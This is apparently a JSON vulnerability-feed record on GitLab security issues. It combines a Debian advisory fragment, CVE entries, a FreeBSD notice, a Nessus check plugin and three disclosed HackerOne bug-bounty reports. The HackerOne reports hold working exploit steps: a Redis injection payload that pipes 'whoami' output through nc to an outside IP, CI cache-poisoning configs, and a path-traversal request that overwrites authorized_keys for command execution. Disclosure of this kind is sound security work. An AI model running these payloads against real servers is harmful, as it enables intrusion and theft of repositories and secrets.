Restrictions for disabled OAuth providers could be bypassed.\n\nFor the stable distribution (stretch), these problems have been fixed in\nversion 8.13.11+dfsg1-8+deb9u1.\n\nWe recommend that you upgrade your gitlab packages.\n\nFor the detailed security status of gitlab please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/gitlab\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2018-03-18T18:51:35", "published": "2018-03-18T18:51:35", "id": "DEBIAN:DSA-4145-1:42E35", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2018/msg00071.html", "title": "[SECURITY] [DSA 4145-1] gitlab security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2019-10-10T12:21:41", "bulletinFamily": "NVD", "description": "Gitlab Enterprise Edition version 10.1.0 is vulnerable to an insufficiently protected credential issue in the project service integration API endpoint resulting in an information disclosure of plaintext password.", "modified": "2019-10-09T23:21:00", "id": "CVE-2017-0925", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0925", "published": "2018-03-21T20:29:00", "title": "CVE-2017-0925", "type": "cve", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2019-10-10T12:21:41", "bulletinFamily": "NVD", "description": "Gitlab Community Edition version 10.3 is vulnerable to a lack of input validation in the system_hook_push queue through web hook component resulting in remote code execution.", "modified": "2019-10-09T23:21:00", "id": "CVE-2017-0916", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0916", "published": "2018-03-21T20:29:00", "title": "CVE-2017-0916", "type": 
"cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-10-10T12:21:41", "bulletinFamily": "NVD", "description": "Gitlab Community Edition version 10.2.4 is vulnerable to a lack of input validation in the GitlabProjectsImportService resulting in remote code execution.", "modified": "2019-10-09T23:21:00", "id": "CVE-2017-0915", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0915", "published": "2018-03-21T20:29:00", "title": "CVE-2017-0915", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-10-10T12:21:41", "bulletinFamily": "NVD", "description": "Gitlab Community Edition version 10.2.4 is vulnerable to lack of input validation in the CI job component resulting in persistent cross site scripting.", "modified": "2019-10-09T23:21:00", "id": "CVE-2017-0917", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0917", "published": "2018-03-21T20:29:00", "title": "CVE-2017-0917", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-10-10T12:21:41", "bulletinFamily": "NVD", "description": "Gitlab Community Edition version 10.3 is vulnerable to a path traversal issue in the GitLab CI runner component resulting in remote code execution.", "modified": "2019-10-09T23:21:00", "id": "CVE-2017-0918", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0918", "published": "2018-03-21T20:29:00", "title": "CVE-2017-0918", "type": "cve", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-10-10T12:21:41", "bulletinFamily": "NVD", "description": "Gitlab Community Edition version 10.3 is vulnerable to an improper authorization issue in the Oauth sign-in component resulting in unauthorized user login.", "modified": "2019-10-09T23:21:00", "id": "CVE-2017-0926", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0926", "published": "2018-03-21T20:29:00", "title": 
"CVE-2017-0926", "type": "cve", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-10-10T12:28:55", "bulletinFamily": "NVD", "description": "Gitlab Community and Enterprise Editions version 10.3.3 is vulnerable to an Insecure Temporary File in the project import component resulting in remote code execution.", "modified": "2019-10-09T23:40:00", "id": "CVE-2018-3710", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-3710", "published": "2018-03-21T20:29:00", "title": "CVE-2018-3710", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2019-05-29T18:32:03", "bulletinFamily": "unix", "description": "\nGitLab developers report:\n\nToday we are releasing versions 10.3.4, 10.2.6, and 10.1.6 for\n\t GitLab Community Edition (CE) and Enterprise Edition (EE).\nThese versions contain a number of important security fixes,\n\t including two that prevent remote code execution, and we strongly\n\t recommend that all GitLab installations be upgraded to one of these\n\t versions immediately.\n\n", "modified": "2018-01-16T00:00:00", "published": "2018-01-16T00:00:00", "id": "65FAB89F-2231-46DB-8541-978F4E87F32A", "href": "https://vuxml.freebsd.org/freebsd/65fab89f-2231-46db-8541-978f4e87f32a.html", "title": "gitlab -- Remote code execution on project import", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2019-12-13T07:29:59", "bulletinFamily": "scanner", "description": "GitLab developers report :\n\nToday we are releasing versions 10.3.4, 10.2.6, and 10.1.6 for GitLab\nCommunity Edition (CE) and Enterprise Edition (EE).\n\nThese versions contain a number of important security fixes, including\ntwo that prevent remote code execution, and we strongly recommend that\nall GitLab installations be upgraded to one of these versions\nimmediately.", "modified": "2019-12-02T00:00:00", "id": 
"FREEBSD_PKG_65FAB89F223146DB8541978F4E87F32A.NASL", "href": "https://www.tenable.com/plugins/nessus/106115", "published": "2018-01-18T00:00:00", "title": "FreeBSD : gitlab -- Remote code execution on project import (65fab89f-2231-46db-8541-978f4e87f32a)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(106115);\n script_version(\"3.4\");\n script_cvs_date(\"Date: 2018/11/10 11:49:47\");\n\n script_cve_id(\"CVE-2017-0915\", \"CVE-2018-3710\");\n\n script_name(english:\"FreeBSD : gitlab -- Remote code execution on project import (65fab89f-2231-46db-8541-978f4e87f32a)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"GitLab developers report :\n\nToday we are releasing versions 10.3.4, 10.2.6, and 10.1.6 for GitLab\nCommunity Edition (CE) and Enterprise Edition (EE).\n\nThese versions contain a number of important security fixes, including\ntwo that prevent remote code execution, and we strongly recommend that\nall GitLab installations be upgraded to one of these versions\nimmediately.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://about.gitlab.com/2018/01/16/gitlab-10-dot-3-dot-4-released/\"\n );\n # https://vuxml.freebsd.org/freebsd/65fab89f-2231-46db-8541-978f4e87f32a.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f6ad525c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n 
script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:gitlab\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"gitlab<10.1.6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "hackerone": [{"lastseen": "2018-08-31T00:39:16", "bulletinFamily": "bugbounty", "bounty": 750.0, "description": "The secret token field of a webhook is vulnerable to a new line injection, allowing an attacker to inject non-HTTP commands in a TCP stream. 
When a GitLab instance is configured with an external Redis instance, e.g. on `127.0.0.1:6379`, it may result in arbitrary code execution on a Sidekiq worker by abusing a blind Server-Side Request Forgery (SSRF) vulnerability in the webhook integration and the new line injection. One of my other reports regarding these SSRFs, #131190, is still open and has been for more than a year. However, because this is a service I haven't reported the SSRF in and chaining it with the new line injection increases the severity of the vulnerability, I decided to report it. To reproduce, start by signing in to the GitLab instance and creating a new project.\n\nTo reproduce the RCE, a Redis server has to be running on port 6379. Follow the GitLab documentation to set up the Redis server and reconfigure GitLab by running `gitlab-ctl reconfigure`. When that's done, continue to go to the Integrations section of the created project. Intercept your network traffic before continuing. Now, enter `http://127.0.0.1:6379/` as the webhook endpoint and `A` as the secret token. When the request is submitted, a request similar to the one below is submitted:\n\n**Request**\n```\nPOST /root/test/hooks HTTP/1.1\nHost: gitlab-instance\n...\n----------1282688597\nContent-Disposition: form-data; name=\"hook[url]\"\n\nhttp://127.0.0.1:6379/\n----------1282688597\nContent-Disposition: form-data; name=\"hook[token]\"\n\nA\n...\n```\n\nIn the request above I changed the body encoding to make it easier to inject the payload. 
Now, replace the `hook[token]` field with the payload below.\n\n**Payload**\n```\nA\n multi\n sadd resque:gitlab:queues system_hook_push\n lpush resque:gitlab:queue:system_hook_push \"{\\\"class\\\":\\\"GitlabShellWorker\\\",\\\"args\\\":[\\\"class_eval\\\",\\\"open(\\'|whoami | nc 192.241.233.143 80\\').read\\\"],\\\"retry\\\":3,\\\"queue\\\":\\\"system_hook_push\\\",\\\"jid\\\":\\\"ad52abc5641173e217eb2e52\\\",\\\"created_at\\\":1513714403.8122594,\\\"enqueued_at\\\":1513714403.8129568}\"\n exec\n```\n\nThen, when the integration persisted, click the `Test` button next to the newly created integration. Here's what happens next: a `POST` request will be submitted to `127.0.0.1`, port `6379` (Redis). Redis is pretty easy on errors, so it'll simply ignore the first couple lines of the HTTP request. Then, a couple headers further down, it is including the `X-GitLab-Token` that is vulnerable to the new line injection. Here's the entire request that is posted:\n\n**Injected request**\n```\nPOST / HTTP/1.1\nContent-Type: application/json\nX-Gitlab-Event: Push Hook\nX-Gitlab-Token: A\n multi\n sadd resque:gitlab:queues system_hook_push\n lpush resque:gitlab:queue:system_hook_push \"{\\\"class\\\":\\\"GitlabShellWorker\\\",\\\"args\\\":[\\\"class_eval\\\",\\\"open(\\'|whoami | nc 192.241.233.143 80\\').read\\\"],\\\"retry\\\":3,\\\"queue\\\":\\\"system_hook_push\\\",\\\"jid\\\":\\\"ad52abc5641173e217eb2e52\\\",\\\"created_at\\\":1513714403.8122594,\\\"enqueued_at\\\":1513714403.8129568}\"\n exec\n exec\nConnection: close\nHost: 192.241.233.143\nContent-Length: 2495\n\n{\"object_kind\":\"push\",\"ev<...>\n```\n\nWhen this is submitted to Redis, a new job will be shifted on the `system_hook_push` command. In order to evaluate Ruby code, I needed a Ruby class that'd implement the `perform` method that would allow me to execute a command or Ruby. 
The `GitlabShellWorker` was exactly what I was looking for:\n\n**GitlabShellWorker**\n```ruby\nclass GitlabShellWorker\n include ApplicationWorker\n include Gitlab::ShellAdapter\n\n def perform(action, *arg)\n gitlab_shell.__send__(action, *arg) # rubocop:disable GitlabSecurity/PublicSend\n end\nend\n```\n\nAs can be seen in the payload, the `GitlabShellWorker` is called with the arguments `class_eval` and the following Ruby code:\n\n```\nopen('|whoami | nc 192.241.233.143 80').read\n```\n\nBecause the Ruby is evaluated on a Sidekiq server, we need to exfiltrate the output of a command through `nc` or a similar tool. In this example, my server is listening on port 80 for connections. When the payload fires, it captures the output of the `whoami` command:\n\n```\n$ nc -l -n -vv -p 80\nListening on [0.0.0.0] (family 0, port 80)\nConnection from [104.236.178.103] port 80 [tcp/*] accepted (family 2, sport 42874)\ngit\n```\n\nBesides the blind SSRF, the underlying vulnerability is the new line injection in the secret token. Fixing the new line injection seems to mitigate the immediate risk of an RCE, but I'd encourage you to reprioritize the fix for the SSRF vulnerabilities in the services (reported by me previously). 
Let me know if you have any questions.\n\n## Impact\n\nAn attacker can execute arbitrary system commands on the server, which exposes access to all git repositories, database, and potentially other secrets that may be used to escalate this further.", "modified": "2018-04-27T02:21:14", "published": "2017-12-19T21:08:22", "id": "H1:299473", "href": "https://hackerone.com/reports/299473", "type": "hackerone", "title": "GitLab: Evaluating Ruby code by injecting Rescue job on the system_hook_push queue through web hook", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T00:39:16", "bulletinFamily": "bugbounty", "bounty": 2000.0, "description": "The GitLab CI runner allows users to cache files and directories in between runs. These files are stored in a ZIP file and uploaded to a shared cache instance. In my testing, the files were uploaded to `runners-cache-4-internal.gitlab.com` and `runners-cache-3-internal.gitlab.com`, even for dedicated runners. It seems odd that dedicated runners use the same shared cache, but perhaps that was an intentional design decision. It could also be a vulnerability. I tried reaching the cache servers from a Docker instance itself, but wasn't able to (I tried from a reverse shell spawned from a Docker instance). There are multiple vulnerabilities (same root cause though) that can be chained to successfully poison the CI runner cache of another project.\n\n**Reading the cache of other projects**\nCreate a new project with a `.gitlab-ci.yml` file in it. The file should contain the following contents. By default, when a cache file is downloaded, it'll download the cache from http://runners-cache-4-internal.gitlab.com:444/runner/project/5024150/cache.\n\n**.gitlab-ci.yml**\n```\na:\n script:\n - ls -lashR\n cache:\n key: ../1/cache\n policy: pull\n paths:\n - .\n```\n\nTo read the cache, the attacker needs to know two things: a project ID (auto incremental) and a cache key. 
By default, the project ID will be prepended to download the cache. But because it's an HTTP request and there's no additional checks on the `key` input, a path traversal vulnerability can be exploited to move up a directory and select the cache from a different project. In this case, when it downloads the cache, it'll request http://runners-cache-4-internal.gitlab.com:444/runner/gitlab/project/1/cache instead of the project ID of the build.\n\n**Build output**\n```\n\u001b[0KRunning with gitlab-runner 10.3.0 (5cf5e19a)\n on docker-auto-scale (e11ae361)\n\u001b[0;m\u001b[0KUsing Docker executor with image ruby:2.1 ...\n\u001b[0;m\u001b[0KUsing docker image sha256:4eadb9b5cb46f487a71d05717762679404f7f6fdec1ba4fa96304de1db07dfef for predefined container...\n\u001b[0;m\u001b[0KPulling docker image ruby:2.1 ...\n\u001b[0;m\u001b[0KUsing docker image ruby:2.1 ID=sha256:223d1eaa9523fa64e78f5a92b701c9c11cbc507f0ff62246dbbacdae395ffea3 for build container...\n\u001b[0;msection_start:1514659811:prepare_script\n\u001b[0KRunning on runner-e11ae361-project-4989754-concurrent-0 via runner-e11ae361-srm-1514658950-a15d8859...\nsection_end:1514659812:prepare_script\n\u001b[0Ksection_start:1514659813:get_sources\n\u001b[0K\u001b[32;1mCloning repository...\u001b[0;m\nCloning into '/builds/jobertabma/build-test'...\n\u001b[32;1mChecking out e01918e5 as master...\u001b[0;m\n\u001b[32;1mSkipping Git submodules setup\u001b[0;m\nsection_end:1514659814:get_sources\n\u001b[0Ksection_start:1514659814:restore_cache\n\u001b[0K\u001b[32;1mChecking cache for ../13083/ruby-235-with-yarn...\u001b[0;m\nDownloading cache.zip from http://runners-cache-5-internal.gitlab.com:444/runner/project/13083/ruby-235-with-yarn\u001b[0;m \n\u001b[32;1mSuccessfully extracted cache\u001b[0;m\nsection_end:1514659844:restore_cache\n```\n\nThe cache key seems to be guessable pretty easily or even unused when no key is specified, since most will correlate with the step they're executed in. 
When I started looking at this, I had to specify which paths to download from the cache. This made exploitation more difficult. However, it (conveniently) allowed me to use `.` as the path, extracting all files from the cache into the working directory. Running `ls -lashR` after that reveals the cache contents in the build output. Files can be read using `cat` or stored as build artifacts through the `.gitlab-ci.yml`.\n\n**Writing the cache of other projects**\nNow that the attacker knows what files are stored in the cache, it can poison the cache with its own file contents. Create another CI YAML file with the following contents:\n\n**.gitlab-ci.yml**\n```\na:\n script:\n - echo 1 > file-to-poison\n cache:\n key: ../1/cache\n policy: push\n paths:\n - file-to-poison\n```\n\nThe attacker has to run a build, which will overwrite the `file-to-poison` file in the cache for project ID 1. Now, when the targeted project starts another CI run, the poisoned cache files will be downloaded and used in the CI run. For example, an attacker could poison `13083/ruby-235-with-yarn`, which would overwrite the Ruby 2.3.5 executable that is being used for GitLab CE CI runs. As you can imagine, someone could enumerate over other projects that use cached executables and overwrite them with their own code.\n\nThis has been tested against the latest version of GitLab.\n\n## Impact\n\nDepending on the files that are cached, this may allow an attacker to run arbitrary code on a victim's Docker instance running a CI run. 
This may expose confidential data, inject artifacts in a build pipeline to ship additional code, among other things.", "modified": "2018-04-27T02:21:50", "published": "2017-12-30T18:58:16", "id": "H1:301432", "href": "https://hackerone.com/reports/301432", "type": "hackerone", "title": "GitLab: GitLab CI runner can read and poison cache of all other projects", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T00:39:16", "bulletinFamily": "bugbounty", "bounty": 2000.0, "description": "The `Projects::GitlabProjectsImportService` contains a vulnerability that allows an attacker to write files to arbitrary directories on the server. This leads to an arbitrary command execution vulnerability by overwriting the `authorized_keys` file. To reproduce, sign in to a GitLab instance that has GitLab import enabled. This is enabled by default, so I'd assume that this vulnerability applies to most GitLab instances. I've installed my GitLab instance through Omnibus.\n\nNext up, intercept your network traffic and upload a GitLab import file. 
Observe the following request being made to the server:\n\n**Request**\n```\nPOST /import/gitlab_project HTTP/1.1\nHost: gitlab-instance\n...\n\n------WebKitFormBoundaryA0TxBpQRLhL4lJQN\nContent-Disposition: form-data; name=\"path\"\ntest\n------WebKitFormBoundaryA0TxBpQRLhL4lJQN\nContent-Disposition: form-data; name=\"namespace_id\"\n\n1\n------WebKitFormBoundaryA0TxBpQRLhL4lJQN\nContent-Disposition: form-data; name=\"file\"; filename=\"2017-12-17_02-20-093_root_test_export.tar.gz\"\nContent-Type: application/x-gzip\n\n<file data>\n```\n\nNow take a closer look at the code that is being executed when this endpoint is hit:\n\n**app/services/projects/gitlab_project_import_service.rb**\n```ruby\n# This service is an adapter used to for the GitLab Import feature, and\n# creating a project from a template.\n# The latter will under the hood just import an archive supplied by GitLab.\nmodule Projects\n class GitlabProjectsImportService\n # ...\n\n def execute\n FileUtils.mkdir_p(File.dirname(import_upload_path))\n FileUtils.copy_entry(file.path, import_upload_path)\n\n Gitlab::ImportExport::ProjectCreator.new(params[:namespace_id],\n current_user,\n import_upload_path,\n params[:path]).execute\n end\n\n # ...\n\n def tmp_filename\n \"#{SecureRandom.hex}_#{params[:path]}\"\n end\n end\nend\n```\n\nThe `import_upload_path` will take the unsanitized `params[:path]` and append it to the GitLab uploads directory. This means that directories can be traversed in the `path` parameter. Another observation is that the file contents of the `file` aren't verified. This means that it may contain any data at that point.\n\nMy first thought was to abuse this vulnerability to exploit a second-order remote code execution by writing an ERB template to the Rails views directory. However, that didn't work because of the file permissions of the GitLab Rails directory. I started looking for other files. I noticed that the uploads directory was writable for the `git` user. 
I took a closer look at the `/var/opt/gitlab/` directory and noticed the `.ssh/authorized_keys` directory. This file was writable for the `git` user, and thus, could be overwritten. This file can specify a command when an SSH connection is made. Now, going back to the original HTTP request, here's the updated request to overwrite the file:\n\n```\nPOST /import/gitlab_project HTTP/1.1\nHost: gitlab-instance\n...\n\n------WebKitFormBoundaryA0TxBpQRLhL4lJQN\nContent-Disposition: form-data; name=\"path\"\n\nnew-test/../../../../../../../../../var/opt/gitlab/.ssh/authorized_keys\n------WebKitFormBoundaryA0TxBpQRLhL4lJQN\nContent-Disposition: form-data; name=\"namespace_id\"\n\n1\n------WebKitFormBoundaryA0TxBpQRLhL4lJQN\nContent-Disposition: form-data; name=\"file\"; filename=\"2017-12-17_02-20-093_root_test_export.tar.gz\"\nContent-Type: application/x-gzip\n\ncommand=\"ls -lash\",no-port-forwarding,no-X11-forwarding,no-agent-forwarding,no-pty ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCxc6GwCNoYCygtTXvoBpn1ACoF4hxhQviNa/0fm3LGGnEWLszswgw4QcaxXYiRumKjBv77eJT2/VbJylZX0uL6D/1/hubTmnp2A1QQJLk1rMvaUGlR8DeQpIcF1T61g3y4lEw5yhaaHRqRLiMpGammQhu0PO6PTDbKlGH+HxA0u8ku/L+lJXncNtpupw3qTDaAt8dgamKAU8RSZRyANK2BVYVj1W376OQFglHIeQW62LsNNgvr9Oe/Ze1YeQqvHO/lv0AeWYdLgjBJOiC5acBFexDBCr4odeSqkDPmKCMI28Mw28hC8fJIHh3vFqXjvlPtkuhDmdap4x+8gUxP77DWoMGw6LY8cuce+sSWY0teawMFW8Dm2R0Fr2iHzpCT8IpKgVHQ24BnmPGWjtWHxDX2DSzdE3GC6dWStVXud3iprgipM2SOxFkwHIISzLybjT1u/fK1sO4IW6E2T1cgSYQd7I2KhNJsgW57GljefD4cmhlwR39ZXZ1GtDCoUxtwZF3Qpr6XaSQ4nL71Wq+Y+v2TGeJzI9HXHRUSP2gZh/BI5kUdeUKkeylhLLouCqII5MlIlMmklXFOOPXoip/KCO36fYRZ1YAhxJ0J1JGX7ws4BnMMKHAHp+YOtRpAfGXcA+yEdMx50PRvXydqNeivfvDlY2JXRRIKUA03O9GoWmPLpQ==\n------WebKitFormBoundaryA0TxBpQRLhL4lJQN--\n```\n\nIn the request, replace my public SSH key with your own and replace `ls -lash` with whatever command you want to execute. When the request is sent to the server, a 302 Found will be returned. 
This is caused by a validation error that is returned because the project name contains invalid characters. Because the files aren't cleaned up, our exploit persists.\n\n**Response**\n```\nHTTP/1.1 302 Found\nServer: nginx\n...\nLocation: http:/gitlab-instance/import/gitlab_project/new?namespace_id=1&path=new-test/../../../../../../../../../var/opt/gitlab/.ssh/authorized_keys\n...\n```\n\nNow, to execute the command, run `ssh git@gitlab-instance`:\n\n```\n$ ssh git@gitlab-instance\nPTY allocation request failed on channel 0\ntotal 84K\n4.0K drwxr-xr-x 18 root root 4.0K Dec 15 04:33 .\n4.0K drwxr-xr-x 3 root root 4.0K Dec 15 04:32 ..\n4.0K drwx------ 2 git root 4.0K Dec 15 04:32 backups\n4.0K -rw------- 1 root root 38 Dec 15 04:33 bootstrapped\n4.0K drwx------ 2 git root 4.0K Dec 17 02:28 gitaly\n4.0K -rw-r--r-- 1 git git 292 Dec 15 04:32 .gitconfig\n4.0K drwx------ 3 git root 4.0K Dec 15 04:32 git-data\n4.0K drwxr-xr-x 3 git root 4.0K Dec 15 04:32 gitlab-ci\n4.0K drwxr-xr-x 2 git root 4.0K Dec 15 04:33 gitlab-monitor\n4.0K drwxr-xr-x 9 git root 4.0K Dec 15 04:33 gitlab-rails\n4.0K drwx------ 2 git root 4.0K Dec 15 04:32 gitlab-shell\n4.0K drwxr-x--- 2 git gitlab-www 4.0K Dec 17 02:28 gitlab-workhorse\n4.0K drwx------ 3 root root 4.0K Dec 17 02:38 logrotate\n4.0K drwxr-x--- 9 root gitlab-www 4.0K Dec 17 02:28 nginx\n4.0K drwxr-xr-x 3 root root 4.0K Dec 15 04:33 node-exporter\n4.0K drwx------ 2 gitlab-psql root 4.0K Dec 15 04:34 postgres-exporter\n4.0K drwxr-xr-x 3 gitlab-psql root 4.0K Dec 17 02:28 postgresql\n4.0K drwxr-x--- 3 gitlab-prometheus root 4.0K Dec 15 04:33 prometheus\n4.0K drwxr-x--- 2 gitlab-redis git 4.0K Dec 17 02:43 redis\n4.0K drwx------ 2 git git 4.0K Dec 17 02:44 .ssh\n4.0K -rw-r--r-- 1 root root 40 Dec 15 04:32 trusted-certs-directory-hash\n```\n\nThis has been tested against GitLab 10.2.4 (the latest version, also used on gitlab.com).\n\n## Impact\n\nAn attacker can execute arbitrary system commands on the server, which exposes access to all git 
repositories, database, and potentially other secrets that may be used to escalate this further.", "modified": "2018-04-27T02:20:49", "published": "2017-12-17T03:11:21", "id": "H1:298873", "href": "https://hackerone.com/reports/298873", "type": "hackerone", "title": "GitLab: Command injection by overwriting authorized_keys file through GitLab import", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}